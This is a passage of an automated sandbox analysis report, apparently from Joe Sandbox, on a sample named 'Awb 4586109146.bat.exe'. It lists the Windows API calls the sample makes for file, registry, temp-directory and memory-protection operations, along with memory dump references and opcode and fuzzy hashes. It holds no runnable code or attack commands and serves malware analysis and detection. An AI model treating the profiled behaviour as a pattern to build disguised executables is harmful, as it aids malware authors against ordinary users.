                                                                      • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                      • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                                      • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2547128583-0
                                                                    • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                    • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                                                    • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                    • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                    • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                    • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                    • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1375471231-0
                                                                    • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                    • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                                                    • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                    • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                      • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointerwsprintf
                                                                    • String ID:
                                                                    • API String ID: 327478801-0
                                                                    • Opcode ID: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                    • Instruction ID: 7f9197a1b1888ebfd6de04269447b21ffcaf0972564048b2e7bc6ee4a29003df
                                                                    • Opcode Fuzzy Hash: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                    • Instruction Fuzzy Hash: 29E06D71E04104AAD710EBA5AE098AEB768DB84318B24407FF201B50D1CA7949119E2D
                                                                    APIs
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringWrite
                                                                    • String ID:
                                                                    • API String ID: 390214022-0
                                                                    • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                    • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                    • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                    • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                    APIs
                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                    • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                                                    • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                    • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                                                    APIs
                                                                    • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: PathSearch
                                                                    • String ID:
                                                                    • API String ID: 2203818243-0
                                                                    • Opcode ID: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
                                                                    • Instruction ID: 76b1046b3576aa71ae923c826af07df126468053c341a8b382c9c50c66927564
                                                                    • Opcode Fuzzy Hash: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
                                                                    • Instruction Fuzzy Hash: EFE0DF72700100EAE710DFA4DE48EAA33A8DF40368B30813AF611B60C0E6B4A9419B2D
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                    • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                                                    • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                    • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                    • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                                                    • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                    • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(7396505C,00000004,00000040,7396504C), ref: 739629B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true
                                                                    • Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: d95a9308519089d6f0997c695cc7e08944cfb4c13a2b5af81a8ede1c1377cc20
                                                                    • Instruction ID: aab625b1aafeca71a5f7f4071ed121f699fb602ffaf5dc38b25d025da8de6fe7
                                                                    • Opcode Fuzzy Hash: d95a9308519089d6f0997c695cc7e08944cfb4c13a2b5af81a8ede1c1377cc20
                                                                    • Instruction Fuzzy Hash: 20F092F250AA81FEC350EF2A86447193BE0B749204B64453EE19CDE241E334C448CF92
                                                                    APIs
                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString
                                                                    • String ID:
                                                                    • API String ID: 1096422788-0
                                                                    • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                    • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                                                    • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                    • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004061B5,?,00000000,?,?,Call,?), ref: 0040614B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                    • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                                                    • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                    • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                                                    APIs
                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
